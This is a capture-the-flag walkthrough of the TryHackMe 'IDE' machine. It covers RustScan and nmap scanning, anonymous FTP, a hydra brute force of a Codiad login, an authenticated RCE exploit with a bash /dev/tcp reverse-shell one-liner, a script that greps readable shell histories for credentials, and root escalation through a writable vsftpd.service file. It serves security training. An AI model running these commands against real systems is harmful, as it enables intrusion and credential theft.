TryHackMe-IDE
First, let's scan all 65535 TCP ports of the target with RustScan to see which services are exposed. The command:
rustscan -a 10.10.41.255 --range 1-65535 --ulimit 5000
Here we can see that there are 4 open ports. Let's visit port 62337/tcp first.
There is a web page hosted at http://10.10.41.255:62337, and it shows the version of the web IDE being served, which will come in handy later.
Let's also grab the service versions on the open ports with nmap:
nmap -sV -p 21,22,80,62337 10.10.41.255
Let's try an anonymous FTP login to the victim machine:
ftp 10.10.41.255
Use anonymous as the username.
The directory looked empty at first, but listing hidden files with ls -la showed three directories. The first two were empty; the third one ( … ) contained a single file ( — ). Let's download it with the get command and check its contents.
The file tells us that there is a user named john and that his password has been reset to a default one. That is enough to brute force the login with hydra and the default rockyou.txt wordlist.
Capture a login request with wrong credentials in Burp Suite and note the highlighted parts (the request path, the POST parameter names, and the error message in the response); these are exactly what the hydra command needs.
Using the request from Burp Suite we can write the hydra command below. The last field is the string hydra treats as a failed login, so it must appear only in failed responses, otherwise hydra will miss the real password:
hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.41.255 -s 62337 http-post-form "/components/user/controller.php:username=^USER^&password=^PASS^:Incorrect Username or Password"
Hydra found the password "password" for the username "john". Let's log in with the found credentials.
Voilà! We are inside the Codiad server.
Searching Exploit-DB for the Codiad version turns up remote code execution exploits, but they all require authentication, so we have to be logged in to the site before using one.
Let's download the exploit and use it:
python2 exploit.py http://10.10.187.42:62337/ john password 10.9.142.61 2222 linux
Before answering y to the exploit script's prompt, start these two listeners in separate terminal tabs:
echo 'bash -c "bash -i >/dev/tcp/10.9.142.61/2223 0>&1 2>&1"' | nc -lnvp 2222
nc -lnvp 2223
The exploit makes the target connect back to port 2222. The first listener answers that connection with a one-liner that spawns an interactive bash reverse shell to port 2223, where the second listener catches the shell we actually use.
We found the user.txt file inside /home/drac. However, it was only readable by drac, so we needed to escalate privileges to that user.
Inside drac's home directory we found that .bash_history was readable by us, and the file contained the following:
mysql -u drac -p '{REDACTED}'
Passwords get reused, so we tried logging in as drac with the password obtained above.
Let's SSH in as drac using the password we just obtained.
The user.txt flag is in drac's home directory; cat the user.txt file to read it.
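The readable .bash_history above is a specific case of a general post-exploitation check: any shell history file another user left readable may contain a secret typed on the command line. The script below is an added example, not part of the original write-up; it takes the home root as a parameter (point it at /home on a target) and greps for the command patterns that commonly carry credentials. The history files used to exercise it are constructed samples.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: hunt readable shell-history
# files under a home root and pull out commands that pass secrets inline.
# $1 is the home root (use /home on a target; a scratch directory offline).
set -u

# Readable *_history files (bash, mysql, python, ...) directly under each
# home directory below $1. A world-readable .bash_history of another user
# is exactly the find made in /home/drac.
find_readable_histories() {
  local root="$1"
  find "$root" -maxdepth 2 -type f -name '.*_history' -readable 2>/dev/null | sort
}

# Lines from one history file that look like they carry a credential:
# mysql/mysqladmin/mysqldump -p..., sshpass -p, curl/wget -u user:pass,
# and generic password= / passwd= assignments.
extract_credential_lines() {
  local file="$1"
  grep -E -e 'mysql(admin|dump)? .*-p' \
          -e 'sshpass -p' \
          -e '(curl|wget) .*(-u|--user)[ =]' \
          -e '(passw(or)?d|PASSWORD)=' "$file"
}

# Total number of credential-looking lines across every readable history
# under the root; a quick "is there anything worth reading here" signal.
count_credential_lines() {
  local root="$1" f total=0
  for f in $(find_readable_histories "$root"); do
    total=$((total + $(extract_credential_lines "$f" | wc -l)))
  done
  echo "$total"
}

# Usage on a target (not run here):
#   for f in $(find_readable_histories /home); do echo "== $f"; extract_credential_lines "$f"; done
```

The pattern list is deliberately short; extend it with whatever tooling the target's users run (sshpass, docker login, git credential helpers) before relying on a zero count.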
Running sudo -l shows which commands drac may run with root privileges. There is exactly one: the vsftpd service can be restarted by drac as root, so let's use that to escalate.
Let's find where the vsftpd unit file lives:
find / -name "*vsftpd*" 2>/dev/null
We have found where vsftpd.service is located, and we also have write permission on it, so let's add our payload to the vsftpd.service file.
After adding the payload, make systemd re-read the unit files, since it keeps the old definition in memory until it does:
systemctl daemon-reload
Then start a listener on your local machine.
Now restart the service with the command sudo -l allowed.
And there you go, we have root privileges now.
Let's get the root flag! CTF finished.